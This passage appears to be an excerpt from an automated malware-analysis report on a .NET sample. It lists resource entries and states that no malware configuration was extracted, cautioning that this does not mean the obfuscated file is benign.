ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
yxz5h0
Characteristics
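No malware configuration was found at this point. This means only that no configuration was extracted from the sample; given the very high symbol obfuscation score reported above, it should not be read as evidence that the file is benign.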